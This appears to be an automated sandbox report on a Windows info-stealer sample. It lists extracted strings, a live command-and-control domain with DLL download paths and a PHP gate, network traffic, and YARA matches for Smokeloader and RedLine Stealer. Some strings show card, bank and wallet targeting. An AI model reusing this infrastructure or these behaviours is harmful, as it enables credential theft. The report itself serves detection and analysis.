                  Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                  Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                  Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                  Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
                  Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                  Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0
                  Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0A
                  Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0C
                  Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0N
                  Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0X
                  Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://www.digicert.com/CPS0
                  Source: pYJeC4VJbw.exe, pYJeC4VJbw.exe, 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2903413122.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, pYJeC4VJbw.exe, 00000000.00000002.2895334222.000000001D511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                  Source: GIJKKKFC.0.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: GIJKKKFC.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ep
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.epnacl
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmp, GIJKKKFC.0.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmp, GIJKKKFC.0.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: GIJKKKFC.0.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: GIJKKKFC.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: GIJKKKFC.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: https://mozilla.org0/
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2884824643.0000000002DBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2884861560.0000000002E26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/)
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/1
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/32e011d2eaa85a0/nss3.dll
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/32e011d2eaa85a0/nss3.dllc
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2884861560.0000000002E26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/3r:
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/5
                  Source: pYJeC4VJbw.exe, 00000000.00000003.2526693387.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, pYJeC4VJbw.exe, 00000000.00000003.2526535738.0000000002E3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/8s/
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/D
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/GHCGHCBFHJJKKJEHJEHJEH
                  Source: pYJeC4VJbw.exe, 00000000.00000003.2526693387.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, pYJeC4VJbw.exe, 00000000.00000003.2526535738.0000000002E3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/Hs
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/JKEHDBGHIDHIEHDBAAFHJK
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/amData
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2884861560.0000000002E09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/c
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2884861560.0000000002E09000.00000004.00000020.00020000.00000000.sdmp, pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/d32e011d2eaa85a0/freebl3.dll
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2884861560.0000000002E09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/d32e011d2eaa85a0/mozglue.dll
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D4F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/d32e011d2eaa85a0/mozglue.dll)
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2884861560.0000000002E09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/d32e011d2eaa85a0/mozglue.dll8
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D4FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/d32e011d2eaa85a0/msvcp140.dll
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2884861560.0000000002E09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/d32e011d2eaa85a0/msvcp140.dlll
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/d32e011d2eaa85a0/nss3.dlln
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/d32e011d2eaa85a0/nss3.dllp
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D4FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/d32e011d2eaa85a0/softokn3.dllF
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D4FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/d32e011d2eaa85a0/softokn3.dllx
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2884861560.0000000002E09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/d32e011d2eaa85a0/sqlite3.dll
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2884861560.0000000002E09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/d32e011d2eaa85a0/sqlite3.dllH
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D4FF000.00000004.00000020.00020000.00000000.sdmp, pYJeC4VJbw.exe, 00000000.00000002.2884861560.0000000002E26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/d32e011d2eaa85a0/vcruntime140.dll
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/es
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/fatta.com/
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/fatta.com/32e011d2eaa85a0/nss3.dllY
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/fatta.com/d32e011d2eaa85a0/nss3.dll
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/fatta.com/d32e011d2eaa85a0/nss3.dll/
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2884861560.0000000002DD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/fdca69ae739b4897.php
                  Source: pYJeC4VJbw.exe, 00000000.00000003.2526693387.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, pYJeC4VJbw.exe, 00000000.00000003.2526535738.0000000002E3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/fdca69ae739b4897.php&
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2884861560.0000000002E09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/fdca69ae739b4897.php-
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2884861560.0000000002E26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/fdca69ae739b4897.php4r#
                  Source: pYJeC4VJbw.exe, 00000000.00000003.2526693387.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, pYJeC4VJbw.exe, 00000000.00000003.2526535738.0000000002E3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/fdca69ae739b4897.php7s&
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2884861560.0000000002E26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/fdca69ae739b4897.php8s/
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2884861560.0000000002E26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/fdca69ae739b4897.phpCoinomi
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2884861560.0000000002E26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/fdca69ae739b4897.phpGs
                  Source: pYJeC4VJbw.exe, 00000000.00000003.2526693387.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, pYJeC4VJbw.exe, 00000000.00000003.2526535738.0000000002E3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/fdca69ae739b4897.phpUs
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2884861560.0000000002E26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/fdca69ae739b4897.phpa
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2884861560.0000000002E09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/fdca69ae739b4897.phpi
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://shaffatta.com/fdca69ae739b4897.phpiYW4qLCpjYXJkcyosKmJhbmtzKiwqY3Z2KiwqY3ZjKiwqYWNjb3VudCosK
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2884861560.0000000002E26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/fdca69ae739b4897.phpmple-storage.jsoncoOaY
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://shaffatta.com/fdca69ae739b4897.phption:
                  Source: pYJeC4VJbw.exe, 00000000.00000003.2526693387.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, pYJeC4VJbw.exe, 00000000.00000003.2526535738.0000000002E3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/fdca69ae739b4897.phpys
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/ost:
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.com/ozglue.dll
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2884824643.0000000002DBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shaffatta.comC
                  Source: IDAKJKEHDBGHIDHIEHDBAAFHJK.0.drString found in binary or memory: https://support.mozilla.org
                  Source: IDAKJKEHDBGHIDHIEHDBAAFHJK.0.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                  Source: IDAKJKEHDBGHIDHIEHDBAAFHJK.0.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                  Source: pYJeC4VJbw.exe, 00000000.00000003.2585700635.000000002349D000.00000004.00000020.00020000.00000000.sdmp, pYJeC4VJbw.exe, 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exe
                  Source: pYJeC4VJbw.exe, 00000000.00000003.2585700635.000000002349D000.00000004.00000020.00020000.00000000.sdmp, pYJeC4VJbw.exe, 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe
                  Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: https://www.digicert.com/CPS0
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmp, GIJKKKFC.0.drString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: GIJKKKFC.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: IDAKJKEHDBGHIDHIEHDBAAFHJK.0.drString found in binary or memory: https://www.mozilla.org
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/about/
                  Source: IDAKJKEHDBGHIDHIEHDBAAFHJK.0.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                  Source: IDAKJKEHDBGHIDHIEHDBAAFHJK.0.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                  Source: pYJeC4VJbw.exe, 00000000.00000003.2715320097.00000000298F4000.00000004.00000020.00020000.00000000.sdmp, IDAKJKEHDBGHIDHIEHDBAAFHJK.0.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                  Source: IDAKJKEHDBGHIDHIEHDBAAFHJK.0.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                  Source: pYJeC4VJbw.exe, 00000000.00000003.2715320097.00000000298F4000.00000004.00000020.00020000.00000000.sdmp, IDAKJKEHDBGHIDHIEHDBAAFHJK.0.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                  Source: unknownHTTPS traffic detected: 168.119.248.46:443 -> 192.168.2.4:49737 version: TLS 1.2

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 00000000.00000002.2884642591.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000002.2884797147.0000000002D97000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000002.2884177155.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000002.2884841467.0000000002DC0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CFBED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset,0_2_6CFBED10
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CFFB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,0_2_6CFFB700
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CFFB8C0 rand_s,NtQueryVirtualMemory,0_2_6CFFB8C0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CFFB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,0_2_6CFFB910
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CF9F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,0_2_6CF9F280
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CFD6CF00_2_6CFD6CF0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CF9D4E00_2_6CF9D4E0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CFBD4D00_2_6CFBD4D0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CFA64C00_2_6CFA64C0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CFF34A00_2_6CFF34A0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CFFC4A00_2_6CFFC4A0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CFA6C800_2_6CFA6C80
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CFA54400_2_6CFA5440
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CFD5C100_2_6CFD5C10
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CFE2C100_2_6CFE2C10
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D00AC000_2_6D00AC00
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CFF85F00_2_6CFF85F0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D00542B0_2_6D00542B
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CFD0DD00_2_6CFD0DD0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CF935A00_2_6CF935A0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D00545C0_2_6D00545C
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CFBED100_2_6CFBED10
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CFC05120_2_6CFC0512
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CFAFD000_2_6CFAFD00
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CF9BEF00_2_6CF9BEF0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CFAFEF00_2_6CFAFEF0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CFF4EA00_2_6CFF4EA0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CFB5E900_2_6CFB5E90
